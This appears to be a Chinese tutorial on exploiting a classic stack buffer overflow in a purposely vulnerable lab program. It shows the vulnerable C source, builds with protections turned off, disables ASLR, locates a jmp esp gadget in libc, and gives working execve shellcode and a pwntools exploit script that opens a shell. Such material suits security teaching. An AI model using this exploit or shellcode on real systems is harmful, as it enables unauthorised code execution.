一,工具安装
pwntools工具安装
$ sudo apt-get update
$ sudo apt-get install python2.7 python-pip python-dev git libssl-dev libffi-dev build-essential
$ sudo pip install --upgrade pip
$ sudo pip install --upgrade pwntools
gcc/gdb安装
$ sudo apt-get install gcc/gdb
peda安装
$ git clone https://github.com/longld/peda.git ~/peda
$ echo "source ~/peda/peda.py" >> ~/.gdbinit
二,程序
源码文件名为:StackOF.c
#include <stdio.h>
#include <string.h>
void vul(char *msg)
{
char buffer[64];
strcpy(buffer,msg);
return;
}
int main()
{
puts("So plz give me your shellcode:");
char buffer[256];
memset(buffer,0,256);
read(0,buffer,256);
vul(buffer);
return 0;
}
可以看到,其是将main函数里的buffer作为msg传入vul函数里,然后拷贝到vul中的buffer,但是main函数中buffer大小为256,而vul函数中buffer的大小为64,这就是问题所在。
为了调试方便把保护操作关闭
gcc编译:gcc -m32 -no-pie -fno-stack-protector -z execstack -o pwnme StackOF.c
-m32:生成32位的可执行文件
-no-pie:关闭程序ASLR/PIE(程序随机化保护)
-fno-stack-protector:关闭Stack Protector/Canary(栈保护)
-z execstack:关闭DEP/NX(堆栈不可执行)
-o:输出
pwnme:编译生成文件的文件名
StackOF.c:编译前的源文件
尝试运行pwnme
观察分析所开启的漏洞缓解策略
最好加一条命令关闭系统的的地址随机化
echo 0 > /proc/sys/kernel/randomize_va_space
三,思路
由源码可知该栈溢出漏洞的原因是在调用strcpy之前未对源字符串的长度进行安全检查。结果就是用户输入过长时,会向高地址覆盖。
那我们可以布局成
假设jmp esp的地址为0x12345678,在运行到原返回地址位置也就是0x12345678时,会执行0x12345678处的指令,也就是jmp esp,同时esp会+4,这时esp就指向了shellcode的起始位置,jmp esp一执行,接下来就是执行shellcode,如图:
所以要构造的
buffer = 填充字符 + jmp_esp +shellcode
四,具体解决分析
jmp esp咋整呢?这个我们可以去libc文件中查找(libc是个啥?),c编写的程序都要加载libc文件.
1.libc怎么找?
首先,我们先查看加载的libc文件是什么版本
打开gdb调试pwnme
直接在main函数上下断点
然后r运行,加载程序,在断点断下
输入 info sharedlibrary或i sharedlibrary
这个时候你就找到了(- _-)!!!
2.找到jmp esp在libc中的地址:jmp_esp_addr_offset
很简单,上代码
from pwn import *
libc = ELF('/lib32/libc.so.6') #文件
jmp_esp = asm('jmp esp') #jmp esp汇编指令的操作数
jmp_esp_addr_in_libc = libc.search(jmp_esp).next() #搜索
print hex(jmp_esp_addr_in_libc) #打印
效果
但但但但是!!!!这还没完,这个地址只是jmp esp在libc文件里的位置(也叫偏移地址,在最终代码将命名为jmp_esp_addr_offset),要知道其在程序里的地址还要加上libc在程序里的起始地址(也叫基址,在最终代码将命名为libc_base),所以jmp esp在程序里的地址 : jmp_esp_addr = jmp_esp_addr_offset+libc_base,结合图解一下
3,找libc在程序里的地址:libc_base
输入指令LD_TRACE_LOADED_OBJECTS=1 ./pwnme可以得到加载位置
4.编写shellcode
通过调用系统调用获得shell
\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80
五,最终代码
from pwn import *
p = process('./pwnme') #运行程序
p.recvuntil("shellcode:") #当接受到字符串'shellcode:'
#找jmp_esp_addr_offset,见本文第四节第二点
libc = ELF('/lib32/libc.so.6')
jmp_esp = asm('jmp esp')
jmp_esp_addr_offset = libc.search(jmp_esp).next()
if jmp_esp_addr_offset is None:
print 'Cannot find jmp_esp in libc'
else:
print hex(jmp_esp_addr_offset)
libc_base = 0xf7dd1000 #你找到的libc加载地址
jmp_esp_addr = libc_base + jmp_esp_addr_offset #得到jmp_esp_addr
print hex(jmp_esp_addr)
#构造布局,本文第三节
buf = 'A'*76 #如何得到填充数据大小://www.greatytc.com/p/278f8d1f8322
buf += p32(jmp_esp_addr)
buf += '\x31\xc9\xf7\xe1\xb0\x0b\x51\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\xcd\x80'
with open('poc','wb') as f:
f.write(buf)
p.sendline(buf) #发送构造后的buf
p.interactive()
六,效果
输入
whoami测试一下
发现为
root用户,已经可以产生交互。附上相关文章一篇:http://www.mamicode.com/info-detail-2232012.htm
